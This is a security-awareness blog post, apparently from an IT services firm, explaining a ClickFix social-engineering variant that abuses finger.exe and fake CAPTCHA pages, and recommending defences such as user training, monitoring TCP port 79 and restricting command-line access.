Understanding the New ClickFix Attack: When “Verify You’re Human” Becomes the Threat
Cybercriminals are once again proving that the most effective attack surface isn’t software – it’s people.
A newly observed evolution of the ClickFix social‑engineering technique shows attackers abusing a decades‑old Windows tool called finger.exe to trick users into executing malicious code themselves. The danger lies not in a technical exploit, but in how convincingly attackers mimic routine online behaviour we’ve all become conditioned to trust.
What Is the ClickFix Attack?
ClickFix is a social‑engineering technique that revolves around fake CAPTCHA checks, browser errors, or “human verification” prompts. Instead of downloading malware directly, attackers instruct users to copy and paste commands into Windows Run, Command Prompt, or PowerShell, often claiming it will “fix” a problem or complete a security check.
Because the action is performed manually by the user and uses legitimate Windows tools, traditional security controls often struggle to distinguish the activity from normal behaviour. Simply, the user becomes the execution mechanism.
What’s New About This Variant?
In this latest evolution, attackers are abusing finger.exe, a legitimate Windows networking utility that dates back to the early days of the internet. Originally designed to retrieve information about users on remote systems, it communicates over TCP port 79, a protocol few organisations actively monitor today.
Instead of retrieving user details, attacker‑controlled servers now respond with malicious commands, often encoded in Base64. These responses are silently executed once the user runs the instructed command, allowing malware to be deployed without any visible download.
Why This Works So Well
This attack succeeds because it exploits behavioural conditioning:
- Users are familiar with CAPTCHA and “verify you’re human” checks
- They trust built‑in Windows tools more than downloaded files
- They are used to following on‑screen instructions to resolve errors quickly
By combining these factors, attackers bypass endpoint protection, web filtering, and even cautious user behaviour all without exploiting a software vulnerability.
Example of how a fake CAPTCHA page (Source – Internet Storm Center)
Real‑World Campaigns Already Seen
Researchers have linked this technique to active malware campaigns such as KongTuke and SmartApeSG, which use fake verification pages to initiate the attack. Once executed, the payloads observed include:
- Information stealers (credential and browser data theft)
- Remote Access Trojans (RATs)
- Follow‑on malware staged through additional downloads
Network analysis confirms outbound traffic on TCP port 79 retrieving malicious instructions disguised as legitimate finger responses.
What This Means for Businesses
For organisations, this attack highlights a critical reality: technical controls alone are not enough.
Even fully patched systems with modern EDR tools can be compromised if users are socially engineered into running commands themselves. This is especially concerning because:
- The technique uses legitimate system binaries (“living off the land”)
- No exploit or malicious attachment is required
- Actions may appear legitimate in audit logs
Security teams must now consider user‑driven execution as a primary risk vector.
How Organisations Can Reduce Risk
At Information Solutions, we recommend a layered response:
- User awareness training focused on fake verification and CAPTCHA abuse
- Blocking or monitoring legacy protocols such as TCP port 79 where not required
- Restricting access to Run, PowerShell, and CMD where business‑appropriate
- Adopting strong endpoint detection that flags unusual command‑line behaviour
Most importantly, users should be taught a simple rule:
No legitimate website will ever ask you to paste commands into your computer.
Looking Ahead
The abuse of finger.exe is a reminder that attackers don’t need zero‑days when they can rely on trust, familiarity, and habit. As cyber threats continue to evolve, security awareness must evolve with them focusing as much on human behaviour as on systems and software.
If you’d like help reviewing your organisation’s exposure to social‑engineering threats, Information Solutions is here to help.